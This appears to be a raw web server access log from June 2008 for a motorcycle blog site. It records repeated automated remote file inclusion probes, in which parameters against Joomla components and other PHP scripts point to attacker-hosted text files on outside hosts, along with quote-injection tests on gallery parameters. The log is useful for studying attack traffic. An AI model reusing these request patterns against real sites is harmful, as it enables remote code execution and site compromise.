218.38.12.93 - - [17/Jun/2008:13:16:19 -0700] "GET /logs/access_080121.log//skin/zero_vote/ask_password.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:16:19 -0700] "GET /logs/access_080121.log//skin/zero_vote/ask_password.php?dir=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.92.219.130 - - [17/Jun/2008:13:16:46 -0700] "GET /logs/index.php?page=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.92.219.130 - - [17/Jun/2008:13:16:46 -0700] "GET /logs/access_080309.log/index.php?page=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.92.219.130 - - [17/Jun/2008:13:16:49 -0700] "GET /index.php?page=http://skill-station.net/help/id5.txt??? HTTP/1.1" 200 18407 "-" "libwww-perl/5.810" "www.dmulk.com"
146.83.237.4 - - [17/Jun/2008:13:16:56 -0700] "GET /logs/access_080215.log/admin.php?include_path=http://kclarkes.t35.com/cd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:17:39 -0700] "GET / HTTP/1.0" 200 18237 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:17:40 -0700] "GET /?show=http%3A%2F%2Fwww.boomerbible.com%2Finstapunk%2FMType%2Farchives%2Fajuq%2Favu%2F&pageid=159 HTTP/1.0" 200 54592 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:17:42 -0700] "GET /?show=http%3A%2F%2Fwww.tureksfuar.com.tr%2Fyeni%2Faxiyeba%2Ftebe%2F&pageid=159 HTTP/1.0" 200 54538 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:17:43 -0700] "GET /?show=http%3A%2F%2Fwww.jyvaskylankirjastot.fi%2Fyhteistyo%2Fwd%2Fmuji%2Frenula%2Fxejado%2F&pageid=159 HTTP/1.0" 200 54607 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:17:45 -0700] "GET /?show=gallery&pageid=http%3A%2F%2Fwww.elettrodataservice.it%2Ffoto_articoli%2Fpivafof%2Fmibi%2F HTTP/1.0" 200 54731 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:17:46 -0700] "GET /?show=gallery&pageid=http%3A%2F%2Fwww.cusianagas.com%2Fadministrador%2Fciw%2Fasezu%2F HTTP/1.0" 200 54681 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:17:48 -0700] "GET /?show=gallery&pageid=http%3A%2F%2Fwww.marsbook.co.kr%2Fmain%2Fcreated%2Fproduct%2F2%2Fmumas%2Fsuvoye%2F HTTP/1.0" 200 54771 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:17:49 -0700] "GET /?show=gallery&pageid=159' HTTP/1.0" 200 54436 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
67.205.74.80 - - [17/Jun/2008:13:18:02 -0700] "GET /logs/access_080429.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.197.136.30 - - [17/Jun/2008:13:18:14 -0700] "GET /logs/access_080131.log//catalog/inludes/include_once.php?include_file=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.197.136.30 - - [17/Jun/2008:13:18:14 -0700] "GET //catalog/inludes/include_once.php?include_file=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.197.136.30 - - [17/Jun/2008:13:18:14 -0700] "GET /logs//catalog/inludes/include_once.php?include_file=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:18:23 -0700] "GET /blog/index.php/category/motorcycles/ HTTP/1.0" 200 17278 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:18:24 -0700] "GET /blog/index.php/comments/feed/ HTTP/1.0" 200 4287 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.219.217.74 - - [17/Jun/2008:13:18:47 -0700] "GET /logs/access_080215.log/include/functions_common.php?gl_root_path=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Jun/2008:13:18:47 -0700] "GET /include/functions_common.php?gl_root_path=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Jun/2008:13:18:47 -0700] "GET /logs/include/functions_common.php?gl_root_path=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:18:50 -0700] "GET /logs/access_071215.log//admin.php?include_path=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:18:50 -0700] "GET //admin.php?include_path=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:18:51 -0700] "GET /logs//admin.php?include_path=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:18:53 -0700] "GET /logs/access_071215.log//admin.php?include_path=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:18:53 -0700] "GET //admin.php?include_path=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:18:53 -0700] "GET /logs//admin.php?include_path=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:18:54 -0700] "GET /blog/index.php/2008/06/05/crestoc-2008-5302008-612008/ HTTP/1.0" 200 7891 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
67.205.74.80 - - [17/Jun/2008:13:18:54 -0700] "GET /logs/access_080429.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.18.76 - - [17/Jun/2008:13:19:16 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [17/Jun/2008:13:19:17 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:19:21 -0700] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/ HTTP/1.0" 200 9419 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:19:53 -0700] "GET /blog/index.php/2008/06/09/crestoc-2008-the-movie/ HTTP/1.0" 200 6953 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
64.15.147.86 - - [17/Jun/2008:13:20:08 -0700] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:13:20:09 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:13:20:09 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.147.86 - - [17/Jun/2008:13:20:13 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.40.125.3 - - [17/Jun/2008:13:20:14 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.40.125.3 - - [17/Jun/2008:13:20:14 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://darkcrystal87.altervista.org/id_sin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:20:23 -0700] "GET /blog/index.php/2008/04/03/hello-world/ HTTP/1.0" 200 6895 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:20:25 -0700] "GET /?show=gallery&pageid=159 HTTP/1.0" 200 54376 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
62.76.116.20 - - [17/Jun/2008:13:20:25 -0700] "GET /logs/access_080312.log/!scanhttp://thefantasyclub.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.76.116.20 - - [17/Jun/2008:13:20:25 -0700] "GET /!scanhttp://thefantasyclub.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.76.116.20 - - [17/Jun/2008:13:20:26 -0700] "GET /logs/!scanhttp://thefantasyclub.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:20:27 -0700] "GET /?show=gallery&pageid=http%3A%2F%2Fwww.marsbook.co.kr%2Fmain%2Fcreated%2Fproduct%2F2%2Fmumas%2Fsuvoye%2F&nggpage=2&pageid=17 HTTP/1.0" 200 54971 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
62.76.116.20 - - [17/Jun/2008:13:20:28 -0700] "GET /logs/access_080123.log/!scanhttp://thefantasyclub.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:20:28 -0700] "GET /?show=gallery&pageid=http%3A%2F%2Fwww.filter-international.com%2Fwebservice%2Faro%2Fpefosi%2F&nggpage=2&pageid=17 HTTP/1.0" 200 54921 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:20:30 -0700] "GET /?show=gallery&pageid=http%3A%2F%2Fwww.marsbook.co.kr%2Fmain%2Fcreated%2Fproduct%2F2%2Fmumas%2Fsuvoye%2F&nggpage=2&pageid=17 HTTP/1.0" 200 54971 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:20:32 -0700] "GET /?show=gallery&pageid=159&nggpage=http%3A%2F%2Fwww.stomol.ru%2Fcatalog%2Frivoz%2Fifewaf%2F&pageid=17 HTTP/1.0" 200 54851 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:20:33 -0700] "GET /?show=gallery&pageid=159&nggpage=http%3A%2F%2Fwww.qubestunes.com%2Ftreytest%2F1%2Fadoyuru%2Falameja%2F&pageid=17 HTTP/1.0" 200 54916 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:20:35 -0700] "GET /?show=gallery&pageid=159&nggpage=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmysqladmin%2Flibraries%2Fnov%2Fuyowuwi%2F&pageid=17 HTTP/1.0" 200 54961 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:20:37 -0700] "GET /?show=gallery&pageid=159'&nggpage=2&pageid=17 HTTP/1.0" 200 54636 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:20:38 -0700] "GET /?show=gallery&pageid=159&nggpage=2'&pageid=17 HTTP/1.0" 200 54636 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:20:40 -0700] "GET /?show=gallery&pageid=17 HTTP/1.0" 200 54371 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
91.197.136.30 - - [17/Jun/2008:13:20:45 -0700] "GET //catalog/inludes/include_once.php?include_file=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
131.252.122.23 - - [17/Jun/2008:13:21:03 -0700] "GET /logs/access.log/index.php?pag=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
131.252.122.23 - - [17/Jun/2008:13:21:03 -0700] "GET /logs/index.php?pag=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:21:11 -0700] "GET /blog/index.php/category/motorcycles/?show=gallery HTTP/1.0" 200 53404 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
131.252.122.23 - - [17/Jun/2008:13:21:13 -0700] "GET /index.php?pag=http://skill-station.net/help/id5.txt??? HTTP/1.1" 200 18405 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.232.188 - - [17/Jun/2008:13:21:19 -0700] "GET /logs//addons/guildbank/searcharrays.php?addonDir=http://www.informatizados.es/docs/info/coi.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
62.193.232.188 - - [17/Jun/2008:13:21:19 -0700] "GET /logs//addons/guildbank/searcharrays.php?addonDir=http://www.informatizados.es/docs/info/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
62.193.232.188 - - [17/Jun/2008:13:21:21 -0700] "GET //addons/guildbank/searcharrays.php?addonDir=http://www.informatizados.es/docs/info/coi.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
62.193.232.188 - - [17/Jun/2008:13:21:22 -0700] "GET //addons/guildbank/searcharrays.php?addonDir=http://www.informatizados.es/docs/info/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
65.55.211.21 - - [17/Jun/2008:13:21:25 -0700] "GET /logs/access_080527.log HTTP/1.1" 200 1179648 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
64.38.43.154 - - [17/Jun/2008:13:21:34 -0700] "GET /[Scripthttp://www.ghostx.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:13:21:35 -0700] "GET /logs/]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [17/Jun/2008:13:21:35 -0700] "GET /]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.27.0.112 - - [17/Jun/2008:13:21:39 -0700] "GET /blog/index.php/2008/04/03/hello-world/ HTTP/1.1" 200 6911 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "dmulk.com"
64.40.147.56 - - [17/Jun/2008:13:22:00 -0700] "GET /logs//phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.40.147.56 - - [17/Jun/2008:13:22:03 -0700] "GET //phpcoin//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://220.130.55.207/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
131.252.122.23 - - [17/Jun/2008:13:22:04 -0700] "GET /logs/access_071225.log/index.php?pag=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:22:10 -0700] "GET /blog/index.php/2008/06/05/crestoc-2008-5302008-612008/?show=gallery HTTP/1.0" 200 27565 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
62.76.116.20 - - [17/Jun/2008:13:22:10 -0700] "GET /logs/!scanhttp://thefantasyclub.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.76.116.20 - - [17/Jun/2008:13:22:11 -0700] "GET /!scanhttp://thefantasyclub.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.12.149.44 - - [17/Jun/2008:13:22:16 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://tugaspeed.info/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
81.92.219.130 - - [17/Jun/2008:13:22:22 -0700] "GET /logs/avatar.php?page=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.92.219.130 - - [17/Jun/2008:13:22:22 -0700] "GET /avatar.php?page=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.92.219.130 - - [17/Jun/2008:13:22:22 -0700] "GET /logs/access_080212.log/avatar.php?page=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:22:38 -0700] "GET /blog/index.php/2008/06/05/crestoc-2008-5302008-612008/trackback/ HTTP/1.0" 200 7901 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:22:39 -0700] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/feed/ HTTP/1.0" 200 1688 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
58.26.137.64 - - [17/Jun/2008:13:22:57 -0700] "GET /logs/access_080101.log/]/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.38.43.154 - - [17/Jun/2008:13:23:05 -0700] "GET /logs/access_080117.log/[Scripthttp://www.ghostx.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.43.154 - - [17/Jun/2008:13:23:05 -0700] "GET /logs/[Scripthttp://www.ghostx.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.136.30 - - [17/Jun/2008:13:23:08 -0700] "GET /logs/access_080312.log//catalog/inludes/include_once.php?include_file=http://www.apel.bulldog-konrad.net/admin/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:23:10 -0700] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery HTTP/1.0" 200 25909 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:23:11 -0700] "GET /blog/index.php/2008/06/09/crestoc-2008-the-movie/feed/ HTTP/1.0" 200 657 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:23:13 -0700] "GET /logs/access_071228.log//admin.php?include_path=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [17/Jun/2008:13:23:17 -0700] "GET /logs/access_071228.log//admin.php?include_path=http://www.ispa-pecs-gis.hu/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:23:29 -0700] "GET /blog/index.php/2008/06/09/crestoc-2008-the-movie/trackback/ HTTP/1.0" 200 6953 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:23:30 -0700] "GET /blog/index.php/2008/04/03/hello-world/feed/ HTTP/1.0" 200 996 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
81.92.219.130 - - [17/Jun/2008:13:23:38 -0700] "GET /logs/access_080326.log/avatar.php?page=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
131.252.122.23 - - [17/Jun/2008:13:23:41 -0700] "GET /logs/access_080118.log/index.php?pag=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.27.12.194 - - [17/Jun/2008:13:23:46 -0700] "GET /logs/index.php?Load=http://nphero.com/go/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:23:48 -0700] "GET /blog/index.php/2008/04/03/hello-world/trackback/ HTTP/1.0" 200 6895 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
64.38.43.154 - - [17/Jun/2008:13:23:48 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ghostx.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.27.12.194 - - [17/Jun/2008:13:23:48 -0700] "GET /index.php?Load=http://nphero.com/go/on.txt? HTTP/1.1" 200 18375 "-" "libwww-perl/5.811" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:23:49 -0700] "GET /?show=gallery&pageid=159&nggpage=2&pageid=17 HTTP/1.0" 200 54576 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:23:50 -0700] "GET /?show=gallery&pageid=http%3A%2F%2Fsans-packing.ru%2Fimg%2Fjipeqap%2Fehudute%2F&nggpage=2&pageid=17&nggpage=2&pageid=17 HTTP/1.0" 200 55086 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:23:52 -0700] "GET /?show=gallery&pageid=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes%2Fpublicaciones%2Ffotos%2Femesuki%2Flewu%2F&nggpage=2&pageid=17&nggpage=2&pageid=17 HTTP/1.0" 200 55256 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
190.180.147.58 - - [17/Jun/2008:13:23:53 -0700] "GET /logs/index.php?Load=http://nphero.com/go/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:23:54 -0700] "GET /?show=gallery&pageid=http%3A%2F%2Fwww.landisempach-emmen.ch%2Faktionen%2Fimage%2Fezu%2Fseq%2F&nggpage=2&pageid=17&nggpage=2&pageid=17 HTTP/1.0" 200 55161 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
190.180.147.58 - - [17/Jun/2008:13:23:58 -0700] "GET /index.php?Load=http://nphero.com/go/on.txt? HTTP/1.1" 200 18375 "-" "libwww-perl/5.805" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:23:58 -0700] "GET /?show=gallery&pageid=159&nggpage=http%3A%2F%2Fwww.qubestunes.com%2Ftreytest%2F1%2Fadoyuru%2Falameja%2F&pageid=17&nggpage=2&pageid=17 HTTP/1.0" 200 55156 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
209.216.213.115 - - [17/Jun/2008:13:23:59 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.swdgems.com/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:24:00 -0700] "GET /?show=gallery&pageid=159&nggpage=http%3A%2F%2Fstoneproperties.co.uk%2Falbum%2Fincludes%2Fnohul%2Fzojaz%2F&pageid=17&nggpage=2&pageid=17 HTTP/1.0" 200 55171 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
213.192.56.18 - - [17/Jun/2008:13:24:02 -0700] "GET /?show=gallery&pageid=159&nggpage=http%3A%2F%2Fwww.qualitas1988.com%2Fimages%2Feditor%2F.thumbs%2Fsowem%2Fmudi%2F&pageid=17&nggpage=2&pageid=17 HTTP/1.0" 200 55206 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "dmulk.com"
